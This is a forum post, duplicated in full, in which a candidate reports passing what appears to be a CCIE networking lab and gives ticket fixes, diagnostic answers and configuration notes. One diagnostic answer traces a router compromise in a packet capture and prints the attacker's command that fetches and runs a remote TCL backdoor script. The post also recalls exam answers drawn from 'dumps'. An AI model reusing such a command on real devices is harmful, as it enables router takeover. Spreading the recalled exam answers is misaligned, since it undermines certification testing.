orowp
10-27-2018, 11:12 AM
Passed the lab on 25-Oct. (TS1, H3Diag, H2+ Config)
Here is the feedback.
TS: TS1
=====
Ticket1: Incorrect ACL statement on SW2 for 176.16.200.0
permit 176.16.200.0
removed it and changed it to: permit 176.16.200.0 0.0.0.255
Ticket2: frame relay configured on R17. Changed it to ppp.
Ticket3: Incorrect router-id on R22. Changed it to lo0 ip of R22.
Ticket4: Passive interface on R12.
Ticket5: Didn't get 2 trace as expected
1. Network 134.21.21.21 not advertised on R21.
3. Added permit statement in prefix-list 194 on R21 for 194.1.1.1. Prefix-list was already applied in route-map with local-pref 99.
2. Trace to 134.21.21.21 and 123.3.3.3 worked as expected.
3. However trace to 8.8.8.8 and 194.1.1.1 didn't work as expected (load-balance) from R12 even when:
a. R12 received these routes from R4 and R6 and
b. ebgp neigh was up on R12 and maximum-paths 2 was pre-configured.
c. Multipaths were not getting installed.
Left this ticket as 10-15 minutes were gone in this debugging.
6.Ticket6: Ipv6 neighborship (via Ipv6 address) was activated in ipv4 address family on both routers.
Activated the Ipv6 neighbor in ipv6 address family on both routers
Ticket7:
a. Nhrp redirect missing on hub
b. ACL on R14 to block esp
c. nhrp shortcut command missing on R19.
Ticket8: Ticket required to set backup path via R8 if R7 fails. Following traced required:
a. Trace from PC104 to Server in AS of PC106
b. Trace from PC106 to 8.8.8.8
1. VLan 200 network of SW connected to PC104 not advertised in ospf --> advertised this network and PC104 got ip address from dhcp server R9.
2. ip nat inside on R8 e0/0.123
3. ospf cost 1000 on e2/0 of R4 and R6.
4. vpnv4 neighborship between R4 and R6.
Tested backup path by shutting down e1/0.123 of R3
Ticket9:
ACL on R21 not causing DMVPN to come up.
Added permit any any command in ACL on R21 to solve the issue.
Ticket10:
1. Added ip add dhcp cli id e0/0 command in e0/0 of NAS.
2. added ip domain-lookup command on R21.
Returned back to ticket 5 after completing. Reloaded R12 but no success. Left the ticket. I took 2hr 15min to solve TS as I didnt want to take risk in TS. Solved the TS carefully and checked ouptut of each ticket 2-3 times.
DONT FORGET TO SAVE THE CHANGES after output is received.
DIAG: H3
=======
Ticket 1: DHCP
1. Packet capture no: 114. (used bootp filter and selected first dhcp discovery packet)
2. What is reason ?
--> Selected this option: packet has dhcp options but relay ip in 0.0.0.0
3. Where is the packet captured?
--> Selected link between SW1-Sw3 (used cdp filter to confirm this in packet capture.
Ticket 2: TCL
First found out Router(victim) and Attacker IPs.
Filters used:
a. http.request.method==GET (source IP in GET request in Victim's IP)
b. tcp.port==1337 (Source IP in SYN packet is Victims IP)
In my case: Victim: 10.1.1.2, Attacker: 10.1.1.1
Q1: Select 4 options:
Selected these options:
1. TCP connection from router to 10.1.1.1
2. TCP connection from remote host to router's IP 10.1.1.2 on port 1337.
3. Download of script in memory via HTTP
4. Installment of ransomware via backdoor.
Q2. Select command which can cause system meltdown:
In my case answer was "r" letter (not sudo poweroff)
Method to check the command:
1. IN packet capture, ue filter tcp.port==1337
2. select first SYN packet and select option 'follow stream' in analysis tab in top right corner in cloudshark (not using right click option like wireshark :P )
3. In the stream, select flow from 10.1.1.1 to 10.1.1.2 --> multiple commands were seen (c,r,q). Note this keywords.
4. Now again changed filter in capture to http.request.method==GET and followed the tcp stream like step 2.
5. In the GET response from 10.1.1.1 to 10.1.1.2, there was a script having above keywords with description (or banner message) next to each keyword)
6. In this script, r keyword had some description like this (dont remember exact description): Your router is compromised. Pay 100 bitcoins to get back your access or be ready for meltdown.
7. Hence selected "r" keyword/command for second question.
Q3. Command used by attacker to run script ?
--> tclsh http://10.1.1.1/bd2.tcl
Note: name of script is bd2.tcl which can be seen in GET request packet.
DIAG section can be hectic due to less time and a lot of attachments in ach question. DOnt blindly follow the dumps. Some dumps have wrong answers. Remember the flow for each diag question and select the best logical answer.
(I took around 25 min to answer 2 questions and rechecked both questions again in last 5 min)
Diag is very important because we need to get atleast 4 out of 6 questions correct in order to score minimum passing score of 60%.
I would be very bad if we cleared TS and CFG and failed in DIAG :P
CFG: H2+
=======
Section1:
1.1: same as WB
1.2: same as WB
1.3: same as WB (PAgP required)
1.4: same as WB
After completing Sec 1, check that int vlan 911 ip of one SW is reachable from other switches (to save time i used following command on all Sw3-6: ping 255.255.255.255 rep 2)
Sec 2.1: OSPF required in DC 65002 with:
a. Type2-LSA not required.
b. vlan 100,101,911 passive on SW3 and Sw4
OSPF was configured in AS65002.
Note: vrf "Corp" present on R17 with int e0/1,lo0 and tu0 added in vrf, so configured "router ospf 1 vrf Corp" on R17.
Note: AS 65001 (core) has ospf preconfigured. Office and headquarters also had ospf configured:
1. Router ids was missing on some devices.
2. ip ospf prio was 0 on R13 e0/1. changed it to 1.
3. Ospf not configured on R9,R10 (required to do in Sec 2.7), did it in 2.1 itself.
Sec 2.2: same as WB. Did sec 3.1 before 2.2
Sec 2.3: same as WB. but required output was not mentioned. Without giving metric rib-scale command, Lo52 was not seen on other routers. Hence gave metric rib-scale 153 on all JACOBS router and R9-R10 (COnfigured eigrp on R9-R10 in 2.3 itself)
Sec 2.4:
1. Same as WB
2. Required allowas-in.
3. bgp preconfigured on CE routers but some commands were missing:
a. router-id
b. next-hop-self on 1 router
c. Lo0 of R14 advertised on R13. Removed it and advertised lo0 of R13.
(THis section takes more time as we need to check preconfiguration on many devices and add missing commands)
There is question that R11,12,13,14 send ONLY required networks: I used prefix list to permit the required 4 networks and applied it to ebgp neighborship. I felt this was logically more better choice (No WB has this solution)
Redistribution on R15, R16: It is mentioned R15,16 should send ospf default route to ther ebgp.
SO i used def info-originate instead of 'neigh x.x.x. def ori' as this command artificially generates default route even if default route is not present in RIB.
My solution was like this:
R15,16:
conf t
router ospf 1
redis bgp 65002 subnets metric-type 1 metric 1000 (used higher metric to satisfy condition of backdoor via R18-R57 in sec 2.8) (dont forget subnets keyword)
router bgp 65002
redis ospf 1 match int ext 2
default-info originate
Sec 2.5:
Question not very clear. So i followed like WB and referred Sec 3.3 for bgp requirements in Jacobs Core. Question 3.3 had:
a. PE in JACOBS should not contain AS65006
b. CE in JACOBS should not contain AS65001
Did conf like WB: removed 65006,added 65001, used no-prepend replace-as
Sec 2.6: same as WB:
R18:
router ospf 1
redistribute bgp 65002 subnets metric-type 1.
Note: R57 had redistribute eigrp command in bgp. Removed it satisfy 2.6 requiredment.
Sed 2.7: Required not to use route-map,access-list, prefix-list for redistribution.
used 'distance external' command in ospf of R9,10
Dont forget to user subnets keyword while redistributing ospf into bgp (OR networks will be distributed classful which will not cause Jacobs to reach Jamesons core networks)
Sec 2.8: Same as WB
Sec 2.9: Same as WB. Required vlan 100 to be configured passive.
Sec 2.10: Same as WB. R4 as acive and R3 as standby.
Sec 2.11: Same as WB. Spokes should not become DR.
There as point something like shortest mode on spoke --> configured ip pim vrf Corp spt-threshold infinity on all spokes.
Sec 3.1: same as WB
Sec 3.2: same as WB
mpls ip already configured on all interfaces. I enabled mpls and set router-id to lo0 on all routers.
Sec 3.3: same as WB. load-sharing on Jacobs PE
Sec 3.4:
a. Each Jamesons site should receive each others routes.
b. Each Jacobs site should receive each others routes.
c. Jamesons site should reach other Jamesons without going via DC.
d. Jacobs site should reach other Jacobs without going via DC.
e. Jamesons and Jacobs sited should communicate via DC.
--> Imported DC in all Jamesons and Jacobs
--> Imported Jamesons in each other. (not in Jacobs)
--> Imported Jacobs in each other. (not in Jamesons)
Sec 4.1: not to use deny.
Sec 4.2: same as WB.
Sec 5.1: same as WB
Sec 5.2: same as WB
Sec 5.3: Same as WB. Sw4 active. Sw3 standby
Sec 5.4: Same as WB.
I took around 5 hours to complete config section, configuring the each section steadily and checking all required outputs after completing each section.
Dont hurry in config section as it becomes difficult and time-consuming to debug in case of some fault. Remember you are not in a RACE to complete config quickly. Use notepad to copy-paste repeating configs (check IPs wile copy-pasting :P)
All the best for your LAB exams.
Go, get your NUMBER :cool:
Here is the feedback.
TS: TS1
=====
Ticket1: Incorrect ACL statement on SW2 for 176.16.200.0
permit 176.16.200.0
removed it and changed it to: permit 176.16.200.0 0.0.0.255
Ticket2: frame relay configured on R17. Changed it to ppp.
Ticket3: Incorrect router-id on R22. Changed it to lo0 ip of R22.
Ticket4: Passive interface on R12.
Ticket5: Didn't get 2 trace as expected
1. Network 134.21.21.21 not advertised on R21.
3. Added permit statement in prefix-list 194 on R21 for 194.1.1.1. Prefix-list was already applied in route-map with local-pref 99.
2. Trace to 134.21.21.21 and 123.3.3.3 worked as expected.
3. However trace to 8.8.8.8 and 194.1.1.1 didn't work as expected (load-balance) from R12 even when:
a. R12 received these routes from R4 and R6 and
b. ebgp neigh was up on R12 and maximum-paths 2 was pre-configured.
c. Multipaths were not getting installed.
Left this ticket as 10-15 minutes were gone in this debugging.
6.Ticket6: Ipv6 neighborship (via Ipv6 address) was activated in ipv4 address family on both routers.
Activated the Ipv6 neighbor in ipv6 address family on both routers
Ticket7:
a. Nhrp redirect missing on hub
b. ACL on R14 to block esp
c. nhrp shortcut command missing on R19.
Ticket8: Ticket required to set backup path via R8 if R7 fails. Following traced required:
a. Trace from PC104 to Server in AS of PC106
b. Trace from PC106 to 8.8.8.8
1. VLan 200 network of SW connected to PC104 not advertised in ospf --> advertised this network and PC104 got ip address from dhcp server R9.
2. ip nat inside on R8 e0/0.123
3. ospf cost 1000 on e2/0 of R4 and R6.
4. vpnv4 neighborship between R4 and R6.
Tested backup path by shutting down e1/0.123 of R3
Ticket9:
ACL on R21 not causing DMVPN to come up.
Added permit any any command in ACL on R21 to solve the issue.
Ticket10:
1. Added ip add dhcp cli id e0/0 command in e0/0 of NAS.
2. added ip domain-lookup command on R21.
Returned back to ticket 5 after completing. Reloaded R12 but no success. Left the ticket. I took 2hr 15min to solve TS as I didnt want to take risk in TS. Solved the TS carefully and checked ouptut of each ticket 2-3 times.
DONT FORGET TO SAVE THE CHANGES after output is received.
DIAG: H3
=======
Ticket 1: DHCP
1. Packet capture no: 114. (used bootp filter and selected first dhcp discovery packet)
2. What is reason ?
--> Selected this option: packet has dhcp options but relay ip in 0.0.0.0
3. Where is the packet captured?
--> Selected link between SW1-Sw3 (used cdp filter to confirm this in packet capture.
Ticket 2: TCL
First found out Router(victim) and Attacker IPs.
Filters used:
a. http.request.method==GET (source IP in GET request in Victim's IP)
b. tcp.port==1337 (Source IP in SYN packet is Victims IP)
In my case: Victim: 10.1.1.2, Attacker: 10.1.1.1
Q1: Select 4 options:
Selected these options:
1. TCP connection from router to 10.1.1.1
2. TCP connection from remote host to router's IP 10.1.1.2 on port 1337.
3. Download of script in memory via HTTP
4. Installment of ransomware via backdoor.
Q2. Select command which can cause system meltdown:
In my case answer was "r" letter (not sudo poweroff)
Method to check the command:
1. IN packet capture, ue filter tcp.port==1337
2. select first SYN packet and select option 'follow stream' in analysis tab in top right corner in cloudshark (not using right click option like wireshark :P )
3. In the stream, select flow from 10.1.1.1 to 10.1.1.2 --> multiple commands were seen (c,r,q). Note this keywords.
4. Now again changed filter in capture to http.request.method==GET and followed the tcp stream like step 2.
5. In the GET response from 10.1.1.1 to 10.1.1.2, there was a script having above keywords with description (or banner message) next to each keyword)
6. In this script, r keyword had some description like this (dont remember exact description): Your router is compromised. Pay 100 bitcoins to get back your access or be ready for meltdown.
7. Hence selected "r" keyword/command for second question.
Q3. Command used by attacker to run script ?
--> tclsh http://10.1.1.1/bd2.tcl
Note: name of script is bd2.tcl which can be seen in GET request packet.
DIAG section can be hectic due to less time and a lot of attachments in ach question. DOnt blindly follow the dumps. Some dumps have wrong answers. Remember the flow for each diag question and select the best logical answer.
(I took around 25 min to answer 2 questions and rechecked both questions again in last 5 min)
Diag is very important because we need to get atleast 4 out of 6 questions correct in order to score minimum passing score of 60%.
I would be very bad if we cleared TS and CFG and failed in DIAG :P
CFG: H2+
=======
Section1:
1.1: same as WB
1.2: same as WB
1.3: same as WB (PAgP required)
1.4: same as WB
After completing Sec 1, check that int vlan 911 ip of one SW is reachable from other switches (to save time i used following command on all Sw3-6: ping 255.255.255.255 rep 2)
Sec 2.1: OSPF required in DC 65002 with:
a. Type2-LSA not required.
b. vlan 100,101,911 passive on SW3 and Sw4
OSPF was configured in AS65002.
Note: vrf "Corp" present on R17 with int e0/1,lo0 and tu0 added in vrf, so configured "router ospf 1 vrf Corp" on R17.
Note: AS 65001 (core) has ospf preconfigured. Office and headquarters also had ospf configured:
1. Router ids was missing on some devices.
2. ip ospf prio was 0 on R13 e0/1. changed it to 1.
3. Ospf not configured on R9,R10 (required to do in Sec 2.7), did it in 2.1 itself.
Sec 2.2: same as WB. Did sec 3.1 before 2.2
Sec 2.3: same as WB. but required output was not mentioned. Without giving metric rib-scale command, Lo52 was not seen on other routers. Hence gave metric rib-scale 153 on all JACOBS router and R9-R10 (COnfigured eigrp on R9-R10 in 2.3 itself)
Sec 2.4:
1. Same as WB
2. Required allowas-in.
3. bgp preconfigured on CE routers but some commands were missing:
a. router-id
b. next-hop-self on 1 router
c. Lo0 of R14 advertised on R13. Removed it and advertised lo0 of R13.
(THis section takes more time as we need to check preconfiguration on many devices and add missing commands)
There is question that R11,12,13,14 send ONLY required networks: I used prefix list to permit the required 4 networks and applied it to ebgp neighborship. I felt this was logically more better choice (No WB has this solution)
Redistribution on R15, R16: It is mentioned R15,16 should send ospf default route to ther ebgp.
SO i used def info-originate instead of 'neigh x.x.x. def ori' as this command artificially generates default route even if default route is not present in RIB.
My solution was like this:
R15,16:
conf t
router ospf 1
redis bgp 65002 subnets metric-type 1 metric 1000 (used higher metric to satisfy condition of backdoor via R18-R57 in sec 2.8) (dont forget subnets keyword)
router bgp 65002
redis ospf 1 match int ext 2
default-info originate
Sec 2.5:
Question not very clear. So i followed like WB and referred Sec 3.3 for bgp requirements in Jacobs Core. Question 3.3 had:
a. PE in JACOBS should not contain AS65006
b. CE in JACOBS should not contain AS65001
Did conf like WB: removed 65006,added 65001, used no-prepend replace-as
Sec 2.6: same as WB:
R18:
router ospf 1
redistribute bgp 65002 subnets metric-type 1.
Note: R57 had redistribute eigrp command in bgp. Removed it satisfy 2.6 requiredment.
Sed 2.7: Required not to use route-map,access-list, prefix-list for redistribution.
used 'distance external' command in ospf of R9,10
Dont forget to user subnets keyword while redistributing ospf into bgp (OR networks will be distributed classful which will not cause Jacobs to reach Jamesons core networks)
Sec 2.8: Same as WB
Sec 2.9: Same as WB. Required vlan 100 to be configured passive.
Sec 2.10: Same as WB. R4 as acive and R3 as standby.
Sec 2.11: Same as WB. Spokes should not become DR.
There as point something like shortest mode on spoke --> configured ip pim vrf Corp spt-threshold infinity on all spokes.
Sec 3.1: same as WB
Sec 3.2: same as WB
mpls ip already configured on all interfaces. I enabled mpls and set router-id to lo0 on all routers.
Sec 3.3: same as WB. load-sharing on Jacobs PE
Sec 3.4:
a. Each Jamesons site should receive each others routes.
b. Each Jacobs site should receive each others routes.
c. Jamesons site should reach other Jamesons without going via DC.
d. Jacobs site should reach other Jacobs without going via DC.
e. Jamesons and Jacobs sited should communicate via DC.
--> Imported DC in all Jamesons and Jacobs
--> Imported Jamesons in each other. (not in Jacobs)
--> Imported Jacobs in each other. (not in Jamesons)
Sec 4.1: not to use deny.
Sec 4.2: same as WB.
Sec 5.1: same as WB
Sec 5.2: same as WB
Sec 5.3: Same as WB. Sw4 active. Sw3 standby
Sec 5.4: Same as WB.
I took around 5 hours to complete config section, configuring the each section steadily and checking all required outputs after completing each section.
Dont hurry in config section as it becomes difficult and time-consuming to debug in case of some fault. Remember you are not in a RACE to complete config quickly. Use notepad to copy-paste repeating configs (check IPs wile copy-pasting :P)
All the best for your LAB exams.
Go, get your NUMBER :cool: